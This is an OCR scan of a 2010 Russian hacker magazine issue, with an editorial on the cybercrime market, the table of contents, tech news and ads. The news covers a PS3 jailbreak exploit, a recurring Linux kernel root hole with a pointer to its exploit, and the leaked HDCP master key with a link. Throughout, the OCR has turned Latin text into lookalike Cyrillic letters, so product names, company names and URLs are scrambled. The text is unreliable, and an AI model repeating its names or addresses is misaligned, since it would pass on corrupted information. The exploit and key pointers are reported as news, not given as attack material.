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Хакерское ремесло и связанная с ним область знаний 
окончательно расслоились. С одной стороны существует 
рынок пентеста/аудита и ѵѵЫіеЬаІ-сообщество 
«технических специалистов в области ИБ», а с другой 
— огромный неформализованный черный рынок 
услуг, софта и информации, который питается сотнями 
миллионов долларов, ежегодно воруемых вуже развитых 
и еще развивающихся странах мира. 

Желая иметь маржу 4000%, в суЬегсгітеустремилось 
огромное число«предпринимателей», ни черта не 
соображающих в таких словах как гіпдО и пдіпх, но 
готовых проинвестировать$15к в покупку чужого троя и 
его загрузку на 30-40 тыс. американских компьютеров с 
бизнес-трафика. 

Примерно представляя объемы этого черного рынка, 
никак не получается удивляться громким арестам 
последнего времени:тутарестовали30дропов,там — 10. 
Все это капля в море: в бизнес вовлечены десятки тысяч 
человек, а до непосредственных организаторов аресты и 
следственные действия доходят крайне редко, дропы же 
здесь — расходный материал. 

Хороший сигнал заключается втом, что сейчас очень 
быстро развивается белый рынок пентеста, аудита и 
«софта для безопасности», который остро нуждается в 



молодых ИБ-специалистах и, стало быть, готов втой или 
иной форме щедро оплачивать их работу. 

Есть та кже фу н да м е нта л ь н ы е п р е д ста вл е н и я о то м , 
что высококлассныетехнические специалисты — это, 
чаще всего, умные, образованныелюди, которым мама 
в детстве доступно объяснила, что для кармы хорошо, а 
что — плохо. Именно поэтому большая их часть не будет 
стремиться к незаконной карьере, если существует 
возможность найти для себя лифт в полезной обществу 
форме. 

Мой прогноз в этой области на следующие 5 лет: 

1 . РостсуЬегсгіте рынка в абсолютном выражении 

2. Тренд на снижение доли мошеннических операций в 
общем вале электронных финансовых транзакций 

3. Окончательное исчезновение грани между 
«электронной» и реальной преступностью 

4. Значительный ростэлектронного мошенничества и 
кражизе-банкингов в РФ. 

Поживем —увидим. 

пікі+022, гл. ред. X 

ибаіке.ііѵеригпаі.соіт 
Ыі:р://ѵкоп1:ак1:е.ги/сІиЫ 0933209 
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004 Все новое за последний месяц 

РЕШМ. 

016 Рабочая лошадка 

Наш обзор ноутбука А51І5 11350с 

018 На что способна Зупоіоду й$М? 

Используем ЫА5 на полную катушку 

020 Тестирование производительных видеокарт 

Выбираем топовый видеоадаптер 

РС20ИЕ . 

025 Колонка редактора 

Создаем РоііаЫе-версию любого приложения 

026 НТМЬб: да придет спаситель 

Что нам даст новый стандарт? 

032 Нех-редакторы ѵ$. шаіѵѵаге 

Выбираем шестнадцатеричный редактор для анализа 
бинарников 

036 Не убиваемые кукисы 

Создаем Соокіе, которые надолго задержатся в системе 

взлом . 

040 Еазу-Наск 

Хакерские секреты простых вещей 

044 Обзор эксплоитов 

Разбираем свежиеуязвимости 

050 Банк-клиент -правила выживания 

Фатальные ошибки в банковском ПО 

055 Меіегргеіегвделе 

Хитрые приемы через МБР 

060 Обуздать ѴѴіпсІЬд 
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068 Драйверы антивирусов - источник зла 

Уязвимости в драйверах проактивныхзащит 

074 Х-ТооІ$ 

Программы для взлома 
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076 Краш-тест антивирусов: тройная пенетрация 

ЫосІ32 р АѵазС Аѵіга: проверим ихна стрессоустойчивость 

082 В гостях у 2еи$'а Громовержца 

Исследуем внутренности падшего бога троянописателей 

СЦЕНА. 

086 СНао$Соп$Ігисііоп$2010 

Отчето событии 

юниксойд. 

092 ВЗй для нетерпеливых 

Изучаем ЫѵеСО и десктопные варианты ВСй-систем 

096 Необычное в обычном 

Нестандартные подходы в личном опыте 

кодинг. 

1 02 ѴѴіпбоѵѵз РіНегіпд РШогт в защите и нападении 

Разбираемся втеории и разрабатываем свой фильтрующий 
драйвер 

106 Опять ты, Брут? 

Изучаем возможности «прокси наоборот» на примере 
брутфорсера 

110 Орепбі для іРИопе 

Создаем ЗО-графику средствами іРЬопеБОК 
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64-битный выпуск 
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118 Нереальные десктопы 

ѴМѵѵагеѴіеѵѵ4.5: обзор возможностей популярного решения для 
виртуализации десктопов 
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Как прикрыть свою пятую точку? 

1 26 Пингвин под колпаком 

Аудит системных событий в І_іпих 

юниты 

1 32 РЗУСНО: Бояться нельзя игнорировать 

Страхи, фобии и их вариации: эмоции, отравляющиежизнь, 
или приятная доза адреналина? 
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Большой РАО 
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144 шт 

Удобные ѵѵеЬ-сервисы 
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РЗЗ МОЖНО ВЗЛОМАТЬ С ПОМОЩЬЮ КАЛЬКУЛЯТОРА 




Совсем недавно мы рассказывали отом, что защита 5опу РІауЗТаіТоп 3, которую 
не могли вскрыть почти три года, пала — в Сети появился магазин, продающий 
ІІСВ-донглыдля джейлбрейка консоли. Эта история получила интересное про- 
должение. П родажу дон глов смогли приостановить довольно быстро (австра- 
лийских авторов устройства прижали анти пираты и власти], и не менее быстро 
компания 5опу отреагировала на известие о найденной дырке — уязвимость, 
которой пользовалисьхакеры, прикрыли, выпустив новую прошивку3.42. Но, 
как гласит старая пословица: «шило в мешке неугаишь». На смену платным 
115 В -устройствам пришел совершенно бесплатный эксплойт, который не замед- 
лил появиться и распространиться в Сети. И неуспели геймеры порадоваться 
та ко му по во роту событий, как предприимчивые энтузиасты обнаружили, что это 
ПО можно портировать... на смартфоны. Первой ласточкой стала ІЧокіа N900, 
за ней — Раіт Рге, потом подтянулисьустройства на базе АпбгоісІ и, конечно, 
девайсы отАррІе. Джейлбрейкприставки при помощи смартфона — казалось 
бы, что можетбытьбезумнее?0твечаем: джейлбрейкприставки при помощи 
программируемого калькулятора ТІ-84 Ріиз :). Нет, это не шутка, ты можешь 
своими глазами посмотреть на пруф-видео по адресу ЬНрУ/ЬгапсІопѵѵ.пеіУрзЗ^ 
и почитать край не занимательный РАО. Что до более простых вариантов взлома, 
все ссылки и описания методов доступны на сайте бирУ/рзх-зсепе.сот . 



> Согласно рейтингу журнала ГогЬ$, Билл Гейтс вновь был признан 
самым богатым американцем. Он возглавил список в 17-й раз. Его 
состояние оценивается в $54 млрд. 







КОНФЕРЕНЦИЯ 

ВИРУСМЕИКЕРОВ 

Мы частенько рассказываем тебе об интересных ивентах разного рода, втом числе 
о хакерских конференциях, форумах, съездах и так далее. Однако оказалось, что 
некоторым представителям ІТ-сцены тесно в рамкахтаких мероприятий, какОЕРСОЫ, 
ВІаскНаІ: и НІТВ. А если говорить конкретнее, то недовольны текущим положением 
вещей оказались... этичные вирусмейкеры. Да, оказывается, такие существуют, и 
более того, эти перцы решили учредить свою собственную конференцию — МаІСоп 
( ѵѵѵѵѵѵ.ппаісоп.огд ). Согласно РАО с официального сайта МаІСоп вовсе не будет пропа- 
гандировать бесконтрольное создание всевозможной цифровой заразы. Напротив, 
предполагается, что высоконравственные мальварь-кодеры будут ради всеобщего 
блага доносить до представителей индустрии ІТ-безопасности все тонкости написания 
вредоносного кода. Да и вообще, эти парни полагают, что писать малварь — нетакуж 
и плохо, ведь это можно делать, например, в исследовательских целях. Всетотже РАО 
на сайте сообщает, что ивентабсолютно легален, согласован с властями и не является 
«ловушкой для хакеров» :). Мероприятие запланировано на начало декабря и пройдет 
в Индии в городах Мумбай и Пуна. 
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ІВМ, логотип ІВМ, ІЬт.сот и изобразительное обозначение являются товарными знаками Іпіегпаііопаі Визіпезз Масбіпез Согрогаііоп, зарегистрированными во многих странах мира. 
Список товарных знаков, зарегистрированных ІВМ на настоящий момент, представлен по адресу ѵѵш.іЬт.сот/ІедаІ/соруІгабе.збішІ. © 2010 ІВМ Согрогаііоп. Все права защищены. 



Реклама 



Разумные технологии для разумной планеты 

Решения для совместной работы 
оптимизируют рабочие процессы 

Знаете ли вы, что сегодня в мире насчитывается почти миллиард мобильных сотрудников? 
Но как оперативно найти специалистов и данные, необходимые для выполнения работы? 
Собрать все средства взаимодействия и совместной работы в единой интегрированной 
платформе - только первый шаг. На разумной планете компании должны учитывать способы 
работы сотрудников и адаптироваться к ним. Открытый подход ІВМ помогает решать особые 
задачи - текущие и будущие. Возможность поиска в реальном времени людей, как и простота 
универсальных интерфейсов различных устройств, повышает эффективность совместной 
работы сотрудников, клиентов, поставщиков и партнеров независимо от того, где они 
находятся - в офисе, дома или на улице. 

Разумный бизнес требует разумных решений, систем и сервисов. 

Сделаем планету разумнее. іЬт.сот/исс/ги 






МЕ6АЫЕѴѴ5 



СТАРАЯ-НОВАЯ ДЫРКА В ЯДРЕ 



Пару лет назад исследователь в области ІТ- 
безопасности Бэн Хоке обнаружил в 64-раз- 
рядных Ыпих-ядрах гооі-уязвимость, которая 
позволяла непривилегированному юзеру 
получить доступ к системе (проблема крылась 
в небезопасной трансляции 32-битных вызо- 
вов]. Багтогда пофиксили, и все о нем благопо- 
лучно забыли. Каково же былоудивление Бана 



Хокса, когда недавно он обнаружил знакомую 
дырку на прежнем месте! Оказывается, воды 
с 2008 года утекло немало, первоначальный 
патч вызвал регрессию, код снова «поправи- 
ли», и уязвимость вернулась. Хоке немного 
переработал свой старый эксплойт и сумел 
заставить его работать и на нынешних 64-бит- 
ных ядрах. Кстати, эксплойт для проверки 



системы можно найти по адресу зесіізіз.ога/ 
би ПсІ ізсіози ге/20 1 0/Бер/268 . Подвержены озна- 
ченной напасти оказались ІІЬипІш, Эіаскѵѵаге, 
Оепіюо, Мапбгіѵа, орепЗІІБЕ, Еебога и ОеЬіап. 
Ядра в дистрибах ПНЕІ_ и СепЮБ версий 3 и 
4 (не 5.x!], по заверениям компании ЕебНаЕ в 
полном порядке, так как для нихтотсамый патч 
принят не был. 



> В Ореп ОНісе обнаружены сразу две критические уязвимости. 

Всего за этот год в открытом «офисе» найдено 12 серьезных багов. 



АРР5Т0КЕ 0ТШТЕ1. 



В ходе ежегодного мероприятия ЮР (Іпіеі Оеѵеіорег Ео гит] 201 0 
компания Іпіеі провела презентацию, посвященную Арр Б р — своему 
магазину приложений для нетбуков других устройств на базе процес- 
соров Аіют. Итак, бета -тест магазина приложений окончен, офици- 
альное открытие уже состоялось, что легко проверить, зайдя по адресу 
ѵѵѵѵѵѵ.аррир.сопп . Уже этой осенью на прилавках магазинов США, 

Индии и Великобритании обещают появиться девайсы, на которых 
софтина АррБр Сепіег будет предустановленна. 

Пользователи, уже обладающие гаджетами «от Іп1:еІ»тоже не останут- 
ся обделенными: для них предусмотрена возможность скачать АррБр 
Сеп1;егв качестве утилиты. Каки в любом другом магазине приложе- 
ний, в АррБр будут как платные, так и бесплатные программы на любой 
вкус (над их созданием уже сейчас трудятся 23 000 разработчиков). 

Что интересно, для всего платного софта предусмотрен полнофункци- 
ональный 24-часовой триал, в ходе которого можно потестить софт и 
решить, стоитли его покупать. Все программы магазина совместимы с 
платформами ѴѴіпбоѵѵз и МееОо Біпих, а также адаптированы под обык- 
новенный «современный нетбук» (сферический в вакууме, не иначе). 




В ближайшем будущем в Іпіеі планируютобеспечить доступ к магазину 
для планшетных ПК, телевизионных приставок и других девайсов с 
Аіют «под капотом». 



В ВЕН СОЗДАЛИ НОВОГО ТРАНСФОРМЕРА 




Компания БеИне на шуткуудивила и порадовала 
все айтишное сообщество, представив в ходе 
конференции ЮЕ201 0 компьютер Оеіі Іпзрігоп Био. 
Этот причудливый гибрид планшетника и нетбука 
совершенно не похож на другиетрансформеры, так 
как в отличие от конкурирующих моделей в Іпзрігоп 
Биотрансформация выполняется за счет поворот- 
ного крепления, которое расположено вн^ри (!) 
рамки, окружающей дисплей. Легким движением 
руки дисплей поворачивается на 1 80 градусов, и у 
тебя в руках оказывается или планшетник, или не- 
тбук. Девайс работает подуправлениемѴѴіпсІоѵѵз 7 
и, по предварительным данным, имеетна борту 
следующие железки: двухъядерный ІпіеІАіют 
N550 (1 ,5 ГГц), 2 Гб оперативной памяти, Н ББ или 
550 объемом 1 60 или 32 Гб. Ксожалению, инфор- 
мацию о других вариантах комплектации, цену и 
дату начала продаж в Беи пока не разглашают, но 
мы обещаем держать тебя в курсе. 



► 006 



ХАКЕР 11/142/10 








Яркий аппетитный дизайн 




ВХ2350 РХ2370 ВХ2335 ВХ2331 



Обновлённая линейка 
!_=□ мониторов Затзипд 

• Разрешение РиІІНЮ 

• Цветовой охват 100% зВѲВ* 

• Время отклика 2 мс (ОЮ) 

• Контрастность МЕОА РСВ 

• Ультратонкий дизайн** 

• модель РХ2370. 

** РХ2370 - 16,5 мм; ВХ2350, ВХ2331 - 19 мм. 

Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), 
ѵѵш/.затзипд.сот. Товар сертифицирован. Реклама. 



МЕ6АЫЕѴѴ5 



30 В КАРМАНЕ 

Рынок последнее время изобилуетанонсами о все новых и новых план- 
шетных ПК— почти все производители, глядя на успехи Арріе, принялись 
конструировать собственные «таблетки». Однако у некоторых компа- 
ний устройства получаются более интересными, чем удругих. На этот 
раз отличились корейцы, первыми сообразившие, что бешеный спрос 
сейчас наблюдается нетолько на планшетники, но и на любые девайсы с 
поддержкой 30. «Таблетка» компании і-Зіабоп называется лаконично — 
130 , и, как нетрудно понять из названия, 7-дюймовый сенсорный экран 
(800x480) планшета поддерживает режим стерео. Конечно, чтобы увидеть 
трехмерку.тебе понадобятся поляризационные очки, но«безочкового» 
30 хорошего качества пока, к сожалению, не существует в природе. Ра- 
ботает устройств о под управлением Ооодіе АпсІгоісІ 2.1 , что определенно 
неплохо, но зато 230 имеет довольно слабые «железные» характеристи- 
ки: процессор Теіесбірз 8901 — 720 МГц, 256 Мб оперативной памяти, под- 
держка ѴѴі-Рі 802.1 1 Ь/д и ВІиеІооШ, РМ-приемник, цифровой ТѴ -тюнер, 




поддержка РиЦ-РЮ. Устройство будет поставляться в двух вариациях: 
с 32 Гб встроенной памяти на борту, и с 64 Гб. В пользу планшета говорит 
то, что стоимость младшей модели составит всего порядка $500. Продажи 
начнутся уже в ноябре. 



> Результаты исследования лаборатории РапсІаІ_аЬ$ гласят, что почти 25% 
вирусов пишутся специально для распространения через ІІЗВ-девайсы. 



103 И ДЖЕЙЛБРЕЙКЕРЫ 




невидимая битва. Арріе вообще- - 
девайсов: пытается придуматьле 



Чуть выше мы уже рассказали о 
состоявшейся в сентябре пре- 
зентации обновленных продуктов 
Арріе, но на презентации была 
представлена и еще одна не «же- 
лезная» новинка. Арріе выпустила 
версию4.1 своей операционки 
і 05, вокруг джейлбрейка которой 
разворачивается настоящая 
выступает против разлочки своих 
эльные способы отключатьтакие 



устройства от сети, все время напоминает, что джейлбрейкустройс- 
тва лишает его гарантии, и выпускает новые прошивки, оперативно 
закрывая дыры, при помощи которых аппараты «вскрывают». Самое 
забавное втом, что пока все это не слишком-то помогает. Так, команда 
Оеѵ-Теат, которая оперативно снабжает обществен ностьджейл брей- 
ками для новых прошивок, просто проигнорировала выход версии 
4.0.2. Дело в том, что 4.0.2 несла в себе лишь одно изменение — закры- 
вала брешь, используемую дляанлока :). Парни из Оеѵ-Теат не стали 
раньше времени раскрывать свои карты и демонстрировать новые 
способы взлома, дождавшись выхода І054.1. И новая прошивка уже 
поддалась их напору, на этот раз благодаря багу в загрузочной области 
РОМ! В Оеѵ-Теат утверждают, что для ликвидации этой дыры Арріе 
потребуется серьезно перекапывать программную часть устройств, или 
же вовсе модифицировать аппаратную составляющую. 



> Уже в октябре появятся первые телевизоры с поддержкой боодіеТѴ. 
Прямо с пульта ты сможешь серфить Инет, смотреть видео с ѴоиТиЬе, 
просмотривать программу передач, искать записи различных шоу. 



КРЕДИТКИ 2.0 

Уже не первый год в исследовательских центрах по всему миру кипит 
работа над созданием более совершенных софтверных систем и аппа- 
ратных решений, способныхзащитить наши банковские счета и карты 
от посягательств взломщиков. Интересную разработку в этой области 
продемонстрировала на конференции ОЕМО американская компания 
Оупатісз. Инженеры компании показали прототипы двух пластиковых 
картнового поколения: МиШАссоипІ и Нісісіеп. Первая карта несетв себе 
микрокомпьютер, и на ее лицевой поверхности расположены кнопки 
переключения между счетами. Дело втом, что МиШАссоипІ объединя- 
ет в себе сразу два банковских счета, переключение между которыми 
происходит на лету. Микрокомпьютер же отвечает за смену информации 
на магнитной полосе. Также карточка комплектуется миниатюрным 
дисплеем, отображающим информацию отом, какой счетактивен в 
данный момент. Вторая карта (Нісісіеп) оснащена повышенной системой 




защиты. Лишь 10 из 16 цифр ее номера нанесены на пластик физически, 
остальные заменяет миниатюрный дисплей. Чтобы увидеть оставшиеся 
шесть цифр и разблокировать карту, требуется ввести секретный код (на 
самой карточке имеются кнопки для ввода). После «выключения» карты 
ее магнитная полоса полностью очищается, так что считать с нее уже 
ничего не получится. Учитывая, что подобных разработокуже насчитыва- 
ется немало, интересно, когда же подобные новшества начнут вводить в 
эксплуатацию банки. 



► 008 
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ѴѴіпсІоѵѵз®. Жизнь без преград. 
І_епоѵо® рекомендует ОС ѴѴіпсІоѵѵз 7. 




ПРЕДЕЛЬНАЯ ОТВЕТСТВЕННОСТЬ. ПРЕДЕЛЬНЫЙ КОНТРОЛЬ. 




МОЩНОСТЬ И МУЛЬТИМЕДИА — ВОСТОРГ! 

Передовые мультимедийные технологии на ноутбуке 
У560 и настольном компьютере «Всё в одном» А700. 



Каждое мгновение можно развлекаться всеми доступными способами! 
Больше свободы — тебе будет еще веселее с ноутбуком У560. Больше 
возможностей дома — поставь домашний мультимедиацентр А700 
с БоІЬу® Ноте ТНеаІег™. Технология РарісІ Бгіѵе — это прямой доступ 
к видео и музыке, а система ОпеКеу ТІпеаІег 2.0 и динамики ЛЗІ_ 
позволяют наслаждаться невероятно реалистичными мультимедиа. 
Каждое мгновение — в радость! 



Фантастическую скорость работы обеспечивает интеллектуальный 
процессор ІпІеІ® Соге™ І5 с технологией ІпІеІ® ТигЬо ВоозГ 
Графическая система ІпІеІ® НО обеспечивает отличное качество 
графики, высокую четкость изображений, насыщенность цветов и 
высокий реализм звука и изображения. 



быстрее 

Умнее. 



Іпіеі, логотип ІпіеІ, ІпТеІ Іпзісіе, ІпіеІ Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 
Для получения дополнительной информации о рейтинге процессоров ІпіеІ посетите сайтѵѵмѵѵ.іпіеі.ги/гаііпд. Реклама. 




МЕ6АЫЕѴѴ5 



РАЗГОН ПРОЦА ЗА $50 

Очень прикольную штуку обнаружили на прилавках магазинов Америки 
удивленные юзеры, о чем и поспешили поведать парням с сайта Епдадеі 
— компания Іпіеі выпустила в продажу карточки для апгрейда процессо- 
ров. Если прочитав слово «карточки»ты подумал о неких платах, ты ошиб- 
ся — карточка в данном случае представляет собой кусоккартона с полем: 
«сотрите защитный слой, чтобы получить код для апгрейда». Похоже, в 
Іпіеі решили пойти по пути софтверного апгрейда своих продуктов, ведь 
упомянутые ЦІ рдгасіе СагсІ попросту разблокируютнекоторыеумышленно 
залоченные производителем функции процессора за отдельную плату. 
Пока в продаже были замечены только карты для «апгрейда» процессо- 
ров I пііеі 0695 1 (наделе они увеличивают пропускную способность чипа, 
активируя Нурег-ТЬгеасІіпд, и задействуют дополнительную кэш-память]. 
Цена такого «разгона» равняется ни много ни мало 50 зеленым бумажкам 
с портретами мертвых американских президентов. Что-то подсказыва- 
ет нам, что если эта инициатива Іпіеі получит продолжение и широкое 




применение, хакерские бесплатные версии «апгрейда процов» окажутся 
неза горами :). 



> Легендарная компания ісі ЗоНѵѵаге опубликовала исходные коды уже 5 
своих игр: Роот, Оиаке, Оиаке 2, ѴѴоИепзІеіп, Реіигп (о Сазііе ѴѴоИепзІеіп 




КЛЮЧИК ДЛЯ НОСР 



ЙЦУКЕН ОТ МТС 

Новый телефон от МТС придется по душе всем любителям текстового 
общения, будьто5М5, е-таіі, ТѵѵіНегили социальные сети. АппаратМТС 
ОѴѴЕРТѴ представляет собой стильный моноблок в матовом «метал- 
лическом» корпусе, оснащенный полноценной дѵѵегіу-клавиатурой 
и удобной клавишей-джойстиком. Картину закономерно дополняет 
ТЕТ-дисплей с диагональю 2.4" и разрешением 320x240. Под корпусом 
девайса скрываются: Ы-Іоп-аккумулятор, способный прожить в режиме 
ожидания 760 часов, а в режиме разговора — 6,2 часа. МТС ОѴѴЕРТѴ 
поддерживает ВІиеІооіЬ 2.0, 14513 и карточки глісгоЗО до 16 Гб (без карты 
пользователю доступно порядка 16 Мб памяти в самом аппарате]. Име- 
ются также ЕМ-приемник, аудиоплеер, функция записи видеороликов и 
поддержка За ѵа. Но погоди сетовать на отсутствие 36, ѴѴіЕі и прочих «благ 
цивилизации», ведь впереди самое главное — цена. Стоимость аппарата 
варьируется от 3490 до 3990 рублей (в зависимости оттого, с подключе- 
нием брать устройство или без]! И это с учетом того, что МТС ОѴѴЕРТѴ не 
залочен под конкретного оператора. 



Загадочная аббревиатура НОСР расшиф- 
ровывается как Нідб-ЬапсІѵѵісШз ОідТаІ 
Сопіепі: Ргоіесііоп, и за этим названием 
скрывается технология защиты медиакон- 
тента, созданная корпорацией I піеі. НОСР 
вполне успешно предотвращает незаконное 
копирование высококачественного видео- 
сигнала, передаваемого через интерфейсы 
ОѴІ, ОізрІауРогС НОМІ, 6ѴІЕ или ІЮІ. Хотя 
уместнее сказать «предотвращала». Дело в 
том, что в сентябре в Сети был опубликован 
НОРС Мазіег Кеу для НОМІ, и в Іпіеіуже 
подтвердили, что это не подделка — ключ на- 
стоящий, он работает. Означенная техноло- 
гия широко применяется в Віи-гау-плеерах, 
телевизорах и других де вайсах та ко го рода 
— все они имеют свои наборы ключей для 
шифрования и дешифровки данных. Теперь 



же, когда скомпрометирован мастер-ключ, 
а не ключи для какой-то отдельной модели 
плеера, у хакеров появилась возможность 
создавать собственные зоигсе- и зіпк-ключи 
для всехтипов вышеупомянутыхустройств. 
Копировать на лету Віи-гау-диски и главное 
— платные трансляции НО-видео (будьто ка- 
бельное телевидение или интернет] должно 
стать куда проще. Впрочем, в Іпіеі заявляют, 
что софтверными методами тут не обойтись, и 
для использования мастер-ключа на полную 
катушку потребуется разработка специально- 
го чипа, который будет вклиниваться между 
НОСР-передатчиком и НОСР-приемником. В 
компании полагают, что это должно оста- 
новить пиратов, номы оптимизма Іпіеі не 
разделяем — наверняка в скором времени на 
сетевых аукционах и полулегальных барахол- 




ках появятся соответствующие устройства. 
Кстати, сам НОМІ Мазіег Кеу можно найти 
здесь — гисІсІ-о.сот/еп/топороЦез-оМбе-тіпсІ/ 
Ібе-Мср-тазіюг-кеѵ . 



► 010 



ХАКЕР 11/142/10 







БЫСТРЫЙ И СТИЛЬНЫЙ 



Ы-СЕРИЯ СМАРТФОНОВ ЫОКІА У НАС ВСЕГДА БЫЛА НА ОСОБОМ 
СЧЕТУ. ЭТИ ИСКЛЮЧИТЕЛЬНО КЛАССНЫЕ ДЕВАЙСЫ ВСЕГДА 
МОЖНО БЫЛО ИСПОЛЬЗОВАТЬ НЕ ТОЛЬКО КАК СОТОВЫЙ 
ТЕЛЕФОН, НО ЕЩЕ И КАК МИНИ-КОМПЬЮТЕР, НА КОТОРЫЙ ЛЕГКО 
УСТАНАВЛИВАЕТСЯ МНОЖЕСТВО РАЗНОГО СОФТА. КАК УЖ ТУТ 
ПРОЙТИ МИМО ПОЯВЛЕНИЯ ДОЛГОЖДАННОЙ НОВИНКИ В этой 
ЛИНЕЙКЕ — ІЧОКІА N8, ТЕМ БОЛЕЕ ЧТО В НЕМ ИСПОЛЬЗУЕТСЯ 
НОВАЯ ОС 5ѴМВІАІЧ л З? ВОТ НАШИ ПЕРВЫЕ ВПЕЧАТЛЕНИЯ. 

Внешний вид 

Брутальный, стильный, железный — первое, что я подумал, когда 
взял в руки телефон. У N8 эффектный внешний вид, который мало 
похож на все другие телефоны, которые выпускает Ыокіа. Это не 
слайдер и не раскладушка — здесь нет каких-либо открывающихся 
частей, это моноблок. При своих размерах (1 13,5x59,1 2x1 2,9мм) и 
весе в 135 грамм девайс отлично лежит в руке, сразу чувствуется 
качественная сборка и приятные материалы. Что особенно приятно, 
большая часть корпуса сделана из алюминия. ІЧокіа отказались от 
задней крышки, которая часто начинает люфтить. Для аккумулято- 
ра сделан специальный отсек, который при необходимости можно 
открыть, открутив два винтика. Телефон доступен в пяти цветовых 
решениях, причем каждое выглядит по-своему выигрышно. 

Что внутри? 




Нельзя не отметить новый 3.5" дисплей с разрешением 640x360 
точек, тип АМОБЕБ позволяет отображать до 1 6,7 млн. цветов. 

В N8 используется емкостный сенсорный экран, который очень 
отзывчив. Причем это один из первых продуктов от ІЧокіа, который 
поддерживает мультитач. Увеличивать масштаб страницы в брау- 
зере, изменять размер фотографии в галерее теперь можно прос- 
тым движением пальцев. Все это работает без задержек и лагов, 
что неудивительно: N8 — это очень мощный смартфон. Высокую 
производительность обеспечивает процессор АРМ1 1 680 МГц. И в 
отличие от других моделей ІЧокіа, в N8 используется сразу 256 Мб 
оперативной памяти — раньше максимумом было 128 Мб. Для раз- 
мещения данных используется 16 Гб встроенной памяти, а также 
слот для карты памяти тігсоЭО объемом до 32 Гб. Но шустрая рабо- 
та — это заслуга не только мощного железа. 

Новая ОС 5утЫап л З 

Важная часть N8 — это новая операционная система 5утЬіап л З. 

При разработке ОС большие силы разработчиков были пущены на 
оптимизацию кода и скорости ее работы. Результат поражает: новая 
платформа действительно работает гораздо быстрее, это заметно 
с самого первого взгляда. Благодаря увеличенному объему опера- 
тивной памяти вполне реально запускать десяток приложений и 
комфортно работать, вообще не выгружая их из памяти. Фирменная 
карточка новой 5утЬіап Л 3 — это новый пользовательский интер- 
фейс с тремя рабочими столами. Каждый рабочий стол настраи- 
вается как тебе удобно — на рабочей поверхности помещаются 
всевозможные виджеты. В результате на экране всегда могут быть 
ярлычки для доступа к важным приложениям или контактам, видже- 
ты приложений (например, для подключения кѴѴі-Гі сети), новости, 
подгруженные через Р55, или обновление статусов друзей в соци- 
альных сетях. Причем интеграция с социальными сетями выполне- 
на максимально прозрачно. 



Мультимедийная часть 

Нет проблем, скажем, сделать фотографию и сразу отправить ее в 
свой профиль в социальных сетях. Это очень на руку, потому что 
фотографировать с таким девайсом захочется часто. Только вду- 
майся — в этот телефон встроена камера 12 Мпикс (!) с оптикой 
Сагі 2еІ55. Видео записывается с разрешением 720р, а выполнить 
несложный монтаж возможно прямо с телефона: среди встроенного 
софта появился редактор видео. В N8 вообще большой упор сделан 
на мультимедийные возможности. На телефоне присутствует разъем 
БЮМІ Міпі, а в комплект входит специальный переходник для под- 
ключения аппарата к телевизору по БЮМІ. Таким образом, содер- 
жимое экрана телефона легко выводится на экран ТВ. Мало этого, 
ты можешь прямо с телефона воспроизводить БЮТѴ-видео с разре- 
шением 720р и поддержкой 5.1 звука. Кстати, в N8 есть отдельный 
графический ускоритель с ОрепОБ 2.0, который поддерживает кучу 
форматов видео: аѵі, ткѵ и т.д. 

Наш вердикт 

Если в двух словах, то N8 — это определенно самый быстрый 
ЭуппЬіап смартфон на сегодняшний день. Благодаря оптимизиро- 
ванной ОС 5утЬіап Л 3 и увеличенной ОЗУ в памяти можно держать 
с десяток приложений. Причем программы устанавливаются в два 
клика через Магазин приложений Оѵі. Запуск приложений стал 
проще за счет виджетов и нового интерфейса с тремя рабочими 
столами. Доступ к внешнему миру обеспечивают модули ѴѴі-Бі с 
поддержкой стандарта 802. 1 1 п и нового стандарта Віиеіооіб 3.0. 
Аккумулятора должно хватать до 390 часов в режиме ожидания и до 
720 минут в режиме разговора, что с таким экраном очень неплохо. 
И при всем этом N8 — это еще кинотеатр в кармане и полноценная 
1 2 Мпикс камера. 



РЕКЛАМА. ИСПОЛЬЗОВАНИЕ СЕРВИСОВ ТРЕБУЕТ ПЕРЕДАЧИ ДАННЫХ ЧЕРЕЗ ИНТЕРНЕТ. СТОИМОСТЬ ПЕРЕДАЧИ ДАННЫХ УТОЧНЯЙТЕ У СВОЕГО ОПЕРАТОРА СВЯЗИ И ИНТЕРНЕТ-ПРОВАЙДЕРА 





МЕ6АЫЕѴѴ5 



«ЯБЛОННЫЙ» УРОЖАЙ 

В сентябре у кого-то начался новый учебный год, а воту компании Арріе 
состоялась презентация обновленных продуктов. Стив Джобс как всегда 
лично представил на суд публики новые іРоб 5НиЖе, Ыапо и Тоисб, 
претерпевшиесерьезные изменения. Пожалуй, главным сюрпризом 
презентации стал сильно «похудевший» Ыапо (меньше на 46% и легче на 
42%), лишившийся колеса управления Сііскѵѵбееі, камеры, возможности 
воспроизведения видео и игрушек. Затотеперьон оснащен квадратным 
тачскрин-дисплеем Ребпа с диагональю 1 .54" и клипсой. Дело втом, что в 
Арріе решили, что целевая аудитория іРоб 5ЬиЖе и Ыапо — это спортивные 
люди, которые часто занимаются фитнесом, бегом и другой активностью. 
Отсюда и клипса, и экран, который легко переворачивается в нужную 
сторону двумя пальцами (вдруг во время пробежки плеер повернется 
вверх ногами]. Новые Ыапо представлены в семи цветах, и стоимость их 
составляет$149за версию с 8 Гб памяти и $1 79 — с 16 Гб. 

Не меньше поправоквнесли и в іРоб Тоисб. Промежуточное звено между 
плеерами и і РГіопе, наконец-то, обзавелосьфронтальной камерой, гирос- 
копом, процессором А4 и дисплеем Ребпа (ІР5-матрица с разрешением 
960x640 пикселей], точнотакимже, какв іРбопе4. Научился Тоисб и сни- 
мать НО-видеоролики. Что интересно, несмотря на столь существенные 
изменения, цена плеера выросла несильно: за модель8 Гб 
придется отдать $229, за 32 Гб — $299 и за 64 Гб — $399 
соответственно. Меньше всех «досталось» 
нижней модели линейки. іРоб 5ЬиЖе, по 
сути, просто вернулся ксвоему прежнему 
внешнему виду — кнопка, которой плеер 
лишился в третьем поколении, теперь снова 
находится на своем законном месте. Эта мо- 
дельтакже каки Ыапо оснащается клипсой и 
поддерживает систему управления голосом 
ѴоісеОѵег. Еще одной приятной новостью 
сталоувеличение времени автономной 
работы девайса: теперь музыку можно слу- 




шать 1 5 часов без перерыва. 56 иЖе доступен в пяти цветовых вариантах и 
представлен одной моделью — на 2 Гб памяти. Его цена равняется $49. 

Но одними только іРоб Джобс не ограничился — в Арріе также серьезно пере- 
работали и телевизионную приставку Арріе 1Л/. Устройство видоизменилось, 
уменьшилось в размерах и отнынетоже базируется на процессоре А4. В Арріе 
